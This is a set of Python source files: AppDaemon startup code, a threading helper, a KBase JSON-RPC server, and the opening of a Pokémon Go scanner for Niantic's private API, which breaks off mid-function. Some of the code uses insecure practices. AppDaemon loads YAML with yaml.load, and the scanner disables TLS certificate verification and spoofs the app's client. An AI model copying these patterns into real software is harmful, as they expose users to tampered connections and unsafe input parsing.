parser.add_argument("-s", "--starttime", help="start time for scheduler <YYYY-MM-DD HH:MM:SS>", type=str)
parser.add_argument("-e", "--endtime", help="end time for scheduler <YYYY-MM-DD HH:MM:SS>", type=str, default=None)
parser.add_argument("-i", "--interval", help="multiplier for scheduler tick", type=float, default=1)
parser.add_argument("-D", "--debug", help="debug level", default="INFO", choices=
[
"DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"
])
parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + __version__)
parser.add_argument('--commtype', help="Communication Library to use", default="WEBSOCKETS", choices=
[
"SSE",
"WEBSOCKETS"
])
parser.add_argument('--profiledash', help=argparse.SUPPRESS, action='store_true')
parser.add_argument('--convertcfg', help="Convert existing .cfg file to yaml", action='store_true')
# Windows does not have Daemonize package so disallow
if platform.system() != "Windows":
parser.add_argument("-d", "--daemon", help="run as a background process", action="store_true")
args = parser.parse_args()
conf.tick = args.tick
conf.interval = args.interval
conf.loglevel = args.debug
conf.profile_dashboard = args.profiledash
if args.starttime is not None:
conf.now = datetime.datetime.strptime(args.starttime, "%Y-%m-%d %H:%M:%S").timestamp()
else:
conf.now = datetime.datetime.now().timestamp()
if args.endtime is not None:
conf.endtime = datetime.datetime.strptime(args.endtime, "%Y-%m-%d %H:%M:%S")
if conf.tick != 1 or conf.interval != 1 or args.starttime is not None:
conf.realtime = False
config_dir = args.config
conf.commtype = args.commtype
if platform.system() != "Windows":
isdaemon = args.daemon
else:
isdaemon = False
if config_dir is None:
config_file_conf = find_path("appdaemon.cfg")
config_file_yaml = find_path("appdaemon.yaml")
else:
config_file_conf = os.path.join(config_dir, "appdaemon.cfg")
if not os.path.isfile(config_file_conf):
config_file_conf = None
config_file_yaml = os.path.join(config_dir, "appdaemon.yaml")
if not os.path.isfile(config_file_yaml):
config_file_yaml = None
config = None
config_from_yaml = False
if config_file_yaml is not None and args.convertcfg is False:
config_from_yaml = True
config_file = config_file_yaml
with open(config_file_yaml, 'r') as yamlfd:
config_file_contents = yamlfd.read()
try:
config = yaml.load(config_file_contents)
except yaml.YAMLError as exc:
print("ERROR", "Error loading configuration")
if hasattr(exc, 'problem_mark'):
if exc.context is not None:
print("ERROR", "parser says")
print("ERROR", str(exc.problem_mark))
print("ERROR", str(exc.problem) + " " + str(exc.context))
else:
print("ERROR", "parser says")
print("ERROR", str(exc.problem_mark))
print("ERROR", str(exc.problem))
sys.exit()
else:
# Read Config File
config_file = config_file_conf
config = configparser.ConfigParser()
config.read_file(open(config_file_conf))
if args.convertcfg is True:
yaml_file = os.path.join(os.path.dirname(config_file_conf), "appdaemon.yaml")
print("Converting {} to {}".format(config_file_conf, yaml_file))
new_config = {}
for section in config:
if section != "DEFAULT":
if section == "AppDaemon":
new_config["AppDaemon"] = {}
new_config["HADashboard"] = {}
new_config["HASS"] = {}
new_section = ""
for var in config[section]:
if var in ("dash_compile_on_start", "dash_dir", "dash_force_compile", "dash_url"):
new_section = "HADashboard"
elif var in ("ha_key", "ha_url", "timeout"):
new_section = "HASS"
else:
new_section = "AppDaemon"
new_config[new_section][var] = config[section][var]
else:
new_config[section] = {}
for var in config[section]:
new_config[section][var] = config[section][var]
with open(yaml_file, "w") as outfile:
yaml.dump(new_config, outfile, default_flow_style=False)
sys.exit()
conf.config_dir = os.path.dirname(config_file)
conf.config = config
conf.logfile = config['AppDaemon'].get("logfile")
conf.errorfile = config['AppDaemon'].get("errorfile")
conf.threads = int(config['AppDaemon'].get('threads'))
conf.certpath = config['AppDaemon'].get("cert_path")
conf.app_dir = config['AppDaemon'].get("app_dir")
conf.latitude = config['AppDaemon'].get("latitude")
conf.longitude = config['AppDaemon'].get("longitude")
conf.elevation = config['AppDaemon'].get("elevation")
conf.time_zone = config['AppDaemon'].get("time_zone")
conf.rss_feeds = config['AppDaemon'].get("rss_feeds")
conf.rss_update = config['AppDaemon'].get("rss_update")
if config_from_yaml is True:
conf.timeout = config['HASS'].get("timeout")
conf.ha_url = config['HASS'].get('ha_url')
conf.ha_key = config['HASS'].get('ha_key', "")
if 'HADashboard' in config:
conf.dash_url = config['HADashboard'].get("dash_url")
conf.dashboard_dir = config['HADashboard'].get("dash_dir")
if config['HADashboard'].get("dash_force_compile") == "1":
conf.dash_force_compile = True
else:
conf.dash_force_compile = False
if config['HADashboard'].get("dash_compile_on_start") == "1":
conf.dash_compile_on_start = True
else:
conf.dash_compile_on_start = False
else:
conf.timeout = config['AppDaemon'].get("timeout")
conf.ha_url = config['AppDaemon'].get('ha_url')
conf.ha_key = config['AppDaemon'].get('ha_key', "")
conf.dash_url = config['AppDaemon'].get("dash_url")
conf.dashboard_dir = config['AppDaemon'].get("dash_dir")
if config['AppDaemon'].get("dash_force_compile") == "1":
conf.dash_force_compile = True
else:
conf.dash_force_compile = False
if config['AppDaemon'].get("dash_compile_on_start") == "1":
conf.dash_compile_on_start = True
else:
conf.dash_compile_on_start = False
if config['AppDaemon'].get("disable_apps") == "1":
conf.apps = False
else:
conf.apps = True
if config['AppDaemon'].get("cert_verify", True) == False:
conf.certpath = False
if conf.dash_url is not None:
conf.dashboard = True
url = urlparse(conf.dash_url)
if url.scheme != "http":
raise ValueError("Invalid scheme for 'dash_url' - only HTTP is supported")
dash_net = url.netloc.split(":")
conf.dash_host = dash_net[0]
try:
conf.dash_port = dash_net[1]
except IndexError:
conf.dash_port = 80
if conf.dash_host == "":
raise ValueError("Invalid host for 'dash_url'")
if conf.threads is None:
conf.threads = 10
if conf.logfile is None:
conf.logfile = "STDOUT"
if conf.errorfile is None:
conf.errorfile = "STDERR"
if isdaemon and (
conf.logfile == "STDOUT" or conf.errorfile == "STDERR"
or conf.logfile == "STDERR" or conf.errorfile == "STDOUT"
):
raise ValueError("STDOUT and STDERR not allowed with -d")
# Setup Logging
conf.logger = logging.getLogger("log1")
numeric_level = getattr(logging, args.debug, None)
conf.logger.setLevel(numeric_level)
conf.logger.propagate = False
# formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
# Send to file if we are daemonizing, else send to console
fh = None
if conf.logfile != "STDOUT":
fh = RotatingFileHandler(conf.logfile, maxBytes=1000000, backupCount=3)
fh.setLevel(numeric_level)
# fh.setFormatter(formatter)
conf.logger.addHandler(fh)
else:
# Default for StreamHandler() is sys.stderr
ch = logging.StreamHandler(stream=sys.stdout)
ch.setLevel(numeric_level)
# ch.setFormatter(formatter)
conf.logger.addHandler(ch)
# Setup compile output
conf.error = logging.getLogger("log2")
numeric_level = getattr(logging, args.debug, None)
conf.error.setLevel(numeric_level)
conf.error.propagate = False
# formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
if conf.errorfile != "STDERR":
efh = RotatingFileHandler(
conf.errorfile, maxBytes=1000000, backupCount=3
)
else:
efh = logging.StreamHandler()
efh.setLevel(numeric_level)
# efh.setFormatter(formatter)
conf.error.addHandler(efh)
# Setup dash output
if config['AppDaemon'].get("accessfile") is not None:
conf.dash = logging.getLogger("log3")
numeric_level = getattr(logging, args.debug, None)
conf.dash.setLevel(numeric_level)
conf.dash.propagate = False
# formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
efh = RotatingFileHandler(
config['AppDaemon'].get("accessfile"), maxBytes=1000000, backupCount=3
)
efh.setLevel(numeric_level)
# efh.setFormatter(formatter)
conf.dash.addHandler(efh)
else:
conf.dash = conf.logger
# Startup message
ha.log(conf.logger, "INFO", "AppDaemon Version {} starting".format(__version__))
ha.log(conf.logger, "INFO", "Configuration read from: {}".format(config_file))
# Check with HA to get various info
ha_config = None
if conf.ha_url is not None:
while ha_config is None:
try:
ha_config = ha.get_ha_config()
except:
ha.log(
conf.logger, "WARNING", "Unable to connect to Home Assistant, retrying in 5 seconds")
if conf.loglevel == "DEBUG":
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", "Unexpected error:")
ha.log(conf.logger, "WARNING", '-' * 60)
ha.log(conf.logger, "WARNING", traceback.format_exc())
ha.log(conf.logger, "WARNING", '-' * 60)
time.sleep(5)
conf.version = parse_version(ha_config["version"])
conf.ha_config = ha_config
conf.latitude = ha_config["latitude"]
conf.longitude = ha_config["longitude"]
conf.time_zone = ha_config["time_zone"]
if "elevation" in ha_config:
conf.elevation = ha_config["elevation"]
if "elevation" in config['AppDaemon']:
ha.log(conf.logger, "WARNING", "'elevation' directive is deprecated, please remove")
else:
conf.elevation = config['AppDaemon']["elevation"]
# Use the supplied timezone
os.environ['TZ'] = conf.time_zone
# Now we have logging, warn about deprecated directives
#if "latitude" in config['AppDaemon']:
# ha.log(conf.logger, "WARNING", "'latitude' directive is deprecated, please remove")
#if "longitude" in config['AppDaemon']:
# ha.log(conf.logger, "WARNING", "'longitude' directive is deprecated, please remove")
#if "timezone" in config['AppDaemon']:
# ha.log(conf.logger, "WARNING", "'timezone' directive is deprecated, please remove")
#if "time_zone" in config['AppDaemon']:
# ha.log(conf.logger, "WARNING", "'time_zone' directive is deprecated, please remove")
init_sun()
config_file_modified = os.path.getmtime(config_file)
# Add appdir and subdirs to path
if conf.apps:
if conf.app_dir is None:
if config_dir is None:
conf.app_dir = find_path("apps")
else:
conf.app_dir = os.path.join(config_dir, "apps")
for root, subdirs, files in os.walk(conf.app_dir):
if root[-11:] != "__pycache__":
sys.path.insert(0, root)
# find dashboard dir
if conf.dashboard:
if conf.dashboard_dir is None:
if config_dir is None:
conf.dashboard_dir = find_path("dashboards")
else:
conf.dashboard_dir = os.path.join(config_dir, "dashboards")
#
# Figure out where our data files are
#
conf.dash_dir = os.path.dirname(__file__)
#
# Setup compile directories
#
if config_dir is None:
conf.compile_dir = find_path("compiled")
else:
conf.compile_dir = os.path.join(config_dir, "compiled")
# Start main loop
if isdaemon:
keep_fds = [fh.stream.fileno(), efh.stream.fileno()]
pid = args.pidfile
daemon = Daemonize(app="appdaemon", pid=pid, action=run,
keep_fds=keep_fds)
daemon.start()
while True:
time.sleep(1)
else:
run()
if __name__ == "__main__":
main()
|
simple_async.py
|
import threading
import time
EMIT_NOTIFICATIONS = False
def ct():
return time.strftime('%H:%M:%S')
class AsyncExec:
def __init__(self, f, args=(), kwargs={}, name='unnamed'):
assert callable(f)
self._name = name
self._function = f
self._args = args
self._kwargs = kwargs
self._thread = threading.Thread(target=self._wrapper)
self._is_running = False
@property
def is_running(self):
return self._is_running
def _wrapper(self):
res = self._function(*self._args, **self._kwargs)
self._result = res
if EMIT_NOTIFICATIONS:
print(ct(), 'Thread', self._name, 'finished')
def start(self):
if EMIT_NOTIFICATIONS:
print(ct(), 'Thread', self._name, 'has started')
if self.has_result():
delattr(self, '_result')
if not self.is_running:
self._is_running = True
self._thread.start()
return self
def has_result(self):
return hasattr(self, '_result')
def result(self):
assert self.has_result()
return self._result
@classmethod
def create_and_start(cls, *args, **kwargs):
return cls(*args, **kwargs).start()
def wait(self):
if self.is_running:
self._thread.join()
self._is_running = False
return self._result
else:
raise Exception('You have to start the Thread first.')
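# Minimal usage sketch (not part of the original module): run a function in a
# background thread and block on its result, using only the class above.
if __name__ == '__main__':
    def _slow_add(a, b):
        time.sleep(0.1)
        return a + b

    job = AsyncExec.create_and_start(_slow_add, args=(1, 2), name='adder')
    print(ct(), 'result =', job.wait())  # prints 3 once the worker finishes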
|
kb_DRAMServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_DRAM.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_DRAM'):
retconfig[nameval[0]] = nameval[1]
return retconfig
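# Example (illustrative): with KB_DEPLOYMENT_CONFIG pointing at a deploy config
# file that contains a [kb_DRAM] section, get_config() returns that section's
# key/value pairs as a plain dict.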
config = get_config()
from kb_DRAM.kb_DRAMImpl import kb_DRAM # noqa @IgnorePep8
impl_kb_DRAM = kb_DRAM(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_DRAM'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_DRAM.run_kb_dram_annotate,
name='kb_DRAM.run_kb_dram_annotate',
types=[dict])
self.method_authentication['kb_DRAM.run_kb_dram_annotate'] = 'required' # noqa
self.rpc_service.add(impl_kb_DRAM.run_kb_dram_annotate_genome,
name='kb_DRAM.run_kb_dram_annotate_genome',
types=[dict])
self.method_authentication['kb_DRAM.run_kb_dram_annotate_genome'] = 'required' # noqa
self.rpc_service.add(impl_kb_DRAM.run_kb_dramv_annotate,
name='kb_DRAM.run_kb_dramv_annotate',
types=[dict])
self.method_authentication['kb_DRAM.run_kb_dramv_annotate'] = 'required' # noqa
self.rpc_service.add(impl_kb_DRAM.status,
name='kb_DRAM.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_DRAM ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
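# Illustrative sketch (not called anywhere): start the WSGI server in a child
# process on an OS-assigned port, then shut it down again with the helpers above.
def _demo_start_and_stop_server():
    port = start_server(newprocess=True)   # returns the bound port number
    print("Demo server listening on port %s" % port)
    stop_server()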
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
example.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
import sys
if 'packages.zip' not in sys.path:
sys.path.insert(0, 'packages.zip')
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import re
import functools
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import time
import errno
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime
from geopy.geocoders import GoogleV3
try:
from gpsoauth import perform_master_login, perform_oauth
except ImportError:
    pass
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
import singleton
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
global_parent_pid = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
# stuff for in-background search thread
search_thread = None
def sysprint(msg):
print(msg, file=sys.stderr)
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
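# Illustrative only (not part of the original script): memoize keys the cache on
# the repr of the call arguments, so a repeated call with the same arguments is
# served from obj.cache instead of re-running the wrapped function.
def _memoize_usage_example():
    @memoize
    def _square(n):
        return n * n

    first = _square(4)    # computed and cached
    second = _square(4)   # returned from the cache
    return first, second  # -> (16, 16)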
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
sysprint('[-] {}'.format(message))
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
def f2i(float):
